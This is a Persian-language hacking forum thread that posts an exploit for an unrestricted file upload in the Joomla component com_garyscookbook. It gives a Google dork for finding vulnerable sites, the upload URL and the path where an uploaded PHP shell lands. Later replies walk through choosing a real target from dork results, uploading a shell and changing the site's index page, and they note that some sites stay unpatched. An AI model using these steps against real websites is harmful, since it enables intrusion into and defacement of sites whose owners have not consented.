رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

پست های پیشنهاد شده


# Exploit Title: joomla com_garyscookbook file upload

# Dork Google: "inurl:com_garyscookbook"

poc:

localhost/path/index.php?option=com_garyscookbook&func=newItem

###########################

upload shell php and go 2 :

localhost/path/components/com_garyscookbook/img_pictures/shell.php

############################

1)

This is the hidden content, please

This is the hidden content, please

2)

This is the hidden content, please

This is the hidden content, please

3 )

This is the hidden content, please

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 1 ماه بعد...

سلام. ببخشید این همه سوال دارم ولی میخوام بدونم نحوه کار با این اکسپلویت چی هست؟ مثلا poc یعنی چی؟ یا اون سه گزینه آخر چین. یا چرا به جای آدرس localhost نوشتید.

 

سلام یک اینکه در تاپیک های آموزشی سوال نپرسید.

 

خوب.این نکته رو هم ذکر کنم که اکسپلویت ها به محض ریپورت پچ میشن و دیگه کاربردی ندارن چه برسه به اینکه مال خیلی وقت پیشه.

 

خوب روش استفاده:

 

ابتدا گوگل دورک رو سرچ میکنید:

 

"inurl:com_garyscookbook"

 

سپس یک تارگت رو انتخاب میکنید و سپس این اکسپلویت رو بهش اضافه میکنید

 

/index.php?option=com_garyscookbook&func=newItem

 

خوب حالا اگر باگ پچ نشده باشه یک آپلودر برای شما میاره و اگر پچ شده باشه چیزی نمیاد.

 

خوب حالا شل ما به مسیر زیر میرود:

 

/components/com_garyscookbook/img_pictures/shell.php

 

----------

 

خوب حالا ما localhost رو به عنوان url سایت در نظر میگیریم(یک مثل فرضی هست)

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 1 سال بعد...
در 10 دقیقه قبل، Worst_boy0 گفته است :

یعنی هک نمیشه. همش الکیه

؟

دوست عزیز زیر آموزش کسی سوال نمیپرسه یا به صورت خصوصی سوال کنید یا تو بخش سوالات بپرسید

قدم اول شما اینه که شل آپلود کنید تو سایت وقتی شل رو آپلود کردی میتونی ایندکس سایتو عوض کنی

This is the hidden content, please

کارهایی رو که گفتن قدم به قدم انجام بدید و اگر به مشکل خوردید به من پیام بدید

هر باگی یک طول عمری داره و بعد مدتی پچ میشه (یعنی دیگه اون باگ وجود نداره و رفع شده)

ولی آخرش بعضی سایتها هنوز باگ رو دارن ولی باید بگردید تا سایتی که با این روش هک بشه رو پیدا کنید

و باز هم تاکید میکنم در پست آموزشی سوال نپرسید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • ایجاد مورد جدید...